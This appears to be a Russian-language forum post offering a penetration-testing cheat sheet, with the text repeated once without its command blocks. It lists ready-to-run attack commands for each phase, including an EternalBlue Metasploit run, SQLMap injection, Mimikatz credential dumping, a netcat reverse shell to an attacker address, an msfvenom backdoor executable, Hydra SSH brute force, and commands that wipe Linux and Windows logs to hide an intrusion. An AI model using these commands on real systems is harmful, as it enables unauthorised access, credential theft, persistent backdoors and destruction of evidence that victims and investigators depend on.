- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Включает этапы пентеста, инструменты и основные команды для каждого этапа.
1. Этапы пентеста
1.1. Разведка (Reconnaissance/Information Gathering)
Сбор информации о целевой системе (активы, IP-адреса, домены, услуги).
Инструменты:
- whois — сбор информации о домене.
- nslookup — запрос DNS-информации.
- theHarvester — сбор информации из публичных источников.
- shodan.io — поиск информации о сервисах и уязвимостях на IP-адресе.
1.2. Сканирование (Scanning)
Анализ сетевой структуры, открытых портов, версий программного обеспечения.
Инструменты:
- Nmap — сканирование портов и служб.
- -sS — SYN scan (сканирование с использованием неполных TCP-соединений),
- -Pn — пропуск проверки доступности хоста (без ping),
- -A — определение ОС, версий программ и выполнение скриптов.
- Netcat (nc) — диагностика открытых портов и ручное взаимодействие с сервисами.
1.3. Анализ уязвимостей (Vulnerability Analysis)
Идентификация уязвимостей в системах или приложениях.
Инструменты:
- Nikto — сканирование веб-серверов на известные уязвимости.
Searchsploit — поиск эксплойтов в базе Exploit-DB.
1.4. Эксплуатация (Exploitation)
Использование уязвимостей для получения доступа к системе.
Инструменты:
- Metasploit Framework — платформа для эксплуатации уязвимостей.
Пример использования:
1. Выбрать эксплойт:
2. Установить цели:
3. Запуск эксплойта:
- SQLMap — автоматизация SQL-инъекций.
1.5. Постэксплуатация (Post-Exploitation)
После получения доступа важно изучить систему, получить дополнительные привилегии и найти полезную информацию.
Инструменты:
- Privilege Escalation — повышение привилегий (Linux):
или поиск конфигурационных ошибок:
- Mimikatz — сбор данных аутентификации в Windows.
1.6. Укрепление позиций (Persistence)
Обеспечение постоянного доступа к скомпрометированной системе.
Инструменты:
- Netcat — создание обратного шелла.
На целевой системе:
- Metasploit — создание бэкдора.
1.7. Подчистка следов (Clearing Tracks)
После завершения атаки важно удалить логи и следы проникновения.
Команды:
- Linux:
- Windows:
2. Основные команды для пентеста
- Netcat (nc) — создание прослушивания порта и работа с сетевыми соединениями.
- Hydra — брутфорс паролей.
- Burp Suite — перехват и модификация HTTP-запросов для анализа веб-приложений.
Используется для анализа трафика и поиска уязвимостей.
1. Этапы пентеста
1.1. Разведка (Reconnaissance/Information Gathering)
Сбор информации о целевой системе (активы, IP-адреса, домены, услуги).
Инструменты:
- whois — сбор информации о домене.
Bash:
whois example.com
- nslookup — запрос DNS-информации.
Bash:
nslookup example.com
- theHarvester — сбор информации из публичных источников.
Bash:
theharvester -d example.com -l 500 -b google
- shodan.io — поиск информации о сервисах и уязвимостях на IP-адресе.
1.2. Сканирование (Scanning)
Анализ сетевой структуры, открытых портов, версий программного обеспечения.
Инструменты:
- Nmap — сканирование портов и служб.
Bash:
nmap -sS -Pn -A -T4 192.168.1.1
- -sS — SYN scan (сканирование с использованием неполных TCP-соединений),
- -Pn — пропуск проверки доступности хоста (без ping),
- -A — определение ОС, версий программ и выполнение скриптов.
- Netcat (nc) — диагностика открытых портов и ручное взаимодействие с сервисами.
Bash:
nc -v 192.168.1.1 80
1.3. Анализ уязвимостей (Vulnerability Analysis)
Идентификация уязвимостей в системах или приложениях.
Инструменты:
- Nikto — сканирование веб-серверов на известные уязвимости.
Bash:
nikto -h http://example.com
- OpenVAS — комплексное сканирование уязвимостей.
[*]Nessus — поиск уязвимостей с помощью одного из наиболее популярных инструментов.
[*]
Searchsploit — поиск эксплойтов в базе Exploit-DB.
Bash:
searchsploit apache 2.4
1.4. Эксплуатация (Exploitation)
Использование уязвимостей для получения доступа к системе.
Инструменты:
- Metasploit Framework — платформа для эксплуатации уязвимостей.
Bash:
msfconsole
Пример использования:
1. Выбрать эксплойт:
Bash:
use exploit/windows/smb/ms17_010_eternalblue
2. Установить цели:
Bash:
set RHOSTS 192.168.1.1
3. Запуск эксплойта:
Bash:
exploit
- SQLMap — автоматизация SQL-инъекций.
Bash:
sqlmap -u "http://example.com/page?id=1" --dbs
1.5. Постэксплуатация (Post-Exploitation)
После получения доступа важно изучить систему, получить дополнительные привилегии и найти полезную информацию.
Инструменты:
- Privilege Escalation — повышение привилегий (Linux):
Bash:
sudo -l
или поиск конфигурационных ошибок:
Bash:
find / -perm -4000 2>/dev/null
- Mimikatz — сбор данных аутентификации в Windows.
Bash:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
1.6. Укрепление позиций (Persistence)
Обеспечение постоянного доступа к скомпрометированной системе.
Инструменты:
- Netcat — создание обратного шелла.
Bash:
nc -lvp 4444
На целевой системе:
Bash:
nc 192.168.1.2 4444 -e /bin/bash
- Metasploit — создание бэкдора.
Bash:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > backdoor.exe
1.7. Подчистка следов (Clearing Tracks)
После завершения атаки важно удалить логи и следы проникновения.
Команды:
- Linux:
Bash:
rm -rf /var/log/*
- Windows:
Bash:
wevtutil cl System
wevtutil cl Security
2. Основные команды для пентеста
- Netcat (nc) — создание прослушивания порта и работа с сетевыми соединениями.
Bash:
nc -lvp 4444 # прослушивание порта
- Hydra — брутфорс паролей.
Bash:
hydra -l admin -P passwords.txt ssh://192.168.1.1
- Burp Suite — перехват и модификация HTTP-запросов для анализа веб-приложений.
Используется для анализа трафика и поиска уязвимостей.